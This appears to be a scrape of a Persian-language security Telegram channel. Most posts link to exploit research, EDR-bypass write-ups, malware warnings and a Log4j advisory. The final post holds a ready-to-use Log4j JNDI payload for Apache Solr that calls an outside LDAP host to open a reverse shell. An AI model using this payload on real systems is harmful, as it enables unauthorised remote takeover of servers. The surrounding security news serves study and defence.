This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Exploiting CVE-2021-43267
heap overflow vulnerability in the TIPC subsystem of the Linux kernel
https://haxx.in/posts/pwning-tipc/
#heap #kernel #linkux #binexp
@securation
heap overflow vulnerability in the TIPC subsystem of the Linux kernel
https://haxx.in/posts/pwning-tipc/
#heap #kernel #linkux #binexp
@securation
بچه هایی که توی باگ بانتی کار میکنید یاهو یه CTF برگزار کرده :)
https://www.yahooinc.com/paranoids/cyber-security-awareness-month-extravaganza-bug-bounty-ctf-public-009/
@securation
https://www.yahooinc.com/paranoids/cyber-security-awareness-month-extravaganza-bug-bounty-ctf-public-009/
@securation
Yahooinc
Cyber Security Awareness Month Extravaganza! Bug Bounty CTF (Public-009) | Paranoids | Yahoo Inc.
In an effort to celebrate National Cybersecurity Awareness Month, the Paranoids are launching a capture the flag-style bug bounty promotion aimed at offensively testing a number of specified Yahoo accounts.
Smishing Android Botnets Going Viral in Iran
https://research.checkpoint.com/2021/smishing-botnets-going-viral-in-iran/
https://research.checkpoint.com/2021/smishing-botnets-going-viral-in-iran/
Check Point Research
Smishing Botnets Going Viral in Iran - Check Point Research
Research by: Shmuel Cohen Introduction In the last few months, multiple Iranian media and social networks have published warnings about ongoing SMS phishing campaigns impersonating Iranian government services. The story is as old as time: victims click on…
Fuzzing Microsoft's RDP Client using Virtual Channels: Overview & Methodology
https://thalium.github.io/blog/posts/fuzzing-microsoft-rdp-client-using-virtual-channels/
https://thalium.github.io/blog/posts/fuzzing-microsoft-rdp-client-using-virtual-channels/
⭕️ هشدار استفاده از KMSpico برای فعال سازی ویندوز.
روشی که برای این مورد بکار برده شده باید برای فعالسازی آنتی ویروس را غیرفعال کنید تا نرم افزار کرک فعال شود، اما به محض غیرفعال سازی آنتی ویروس، نرم افزار شروع به سرقت ولت رمزارز و کارت های اعتباری و پسورد و مواردی که در سیستم ذخیره شدند میکنه.
https://thehackernews.com/2021/12/malicious-kmspico-windows-activator.html
#windozd #kms #activation
@securation
روشی که برای این مورد بکار برده شده باید برای فعالسازی آنتی ویروس را غیرفعال کنید تا نرم افزار کرک فعال شود، اما به محض غیرفعال سازی آنتی ویروس، نرم افزار شروع به سرقت ولت رمزارز و کارت های اعتباری و پسورد و مواردی که در سیستم ذخیره شدند میکنه.
https://thehackernews.com/2021/12/malicious-kmspico-windows-activator.html
#windozd #kms #activation
@securation
⭕️ Grafana unauthorized arbitrary file read.
#infosec #cybersecuritytips #GRAFANA #bugbounty
@securation
#infosec #cybersecuritytips #GRAFANA #bugbounty
@securation
⭕️ Bypassing ETW-Based Solutions
https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html
#etw #redteam #blueteam #malware #edr
@securation
https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html
#etw #redteam #blueteam #malware #edr
@securation
⭕️ Ransomware and Vulnerability Management - Download FREE preview and check the articles!
https://hakin9.org/download/ransomware-and-vulnerability-management-preview/
#infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding
@securation
https://hakin9.org/download/ransomware-and-vulnerability-management-preview/
#infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding
@securation
Hakin9 - IT Security Magazine
Ransomware and Vulnerability Management preview - Hakin9 - IT Security Magazine
We decided to dedicate our June edition to a very current and recurring topic - Ransomware and Vulnerability Management. During the COVID pandemic, the ransomware industry was more powerful than ever. That’s why it’s so crucial to understand how ransomware…
👍1
whitepaper.pdf
770.8 KB
⭕️این #whitepaper مربوط به اکسپلویت شدن اوبونتو هست که توی مسابقات pwn2own انجام شد و هنوز روی نسخه Ubuntu Desktop 20.10 هم جواب میده با وجود اینکه آپدیت هم اومده واسش.
پ ن : همه مسابقات اوبونتو رو میارن وسط انگار ویندوز XP sp1 اکسپلویت میکنند :)
#ubuntu #linux #kernelexp #binexp
@securation
پ ن : همه مسابقات اوبونتو رو میارن وسط انگار ویندوز XP sp1 اکسپلویت میکنند :)
#ubuntu #linux #kernelexp #binexp
@securation
👍1
⭕️ آسیب پذیری جدید روی Log4j اومده بود که با شماره CVE-2021-44228 ثبت شده هنوز خیلی جاها آسیب پذیر هستند.
شما میتونید با استفاده از اسکریپتی که به Template اسکنر Nuclei اضافه شده تارگت های مورد نظر رو بررسی کنید.
منابع :
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
#bugbounty #pentest #Log4j #security
@securation
شما میتونید با استفاده از اسکریپتی که به Template اسکنر Nuclei اضافه شده تارگت های مورد نظر رو بررسی کنید.
منابع :
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
#bugbounty #pentest #Log4j #security
@securation
apache solr EXP #log4j
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
#log4j #apache #exploit
@securation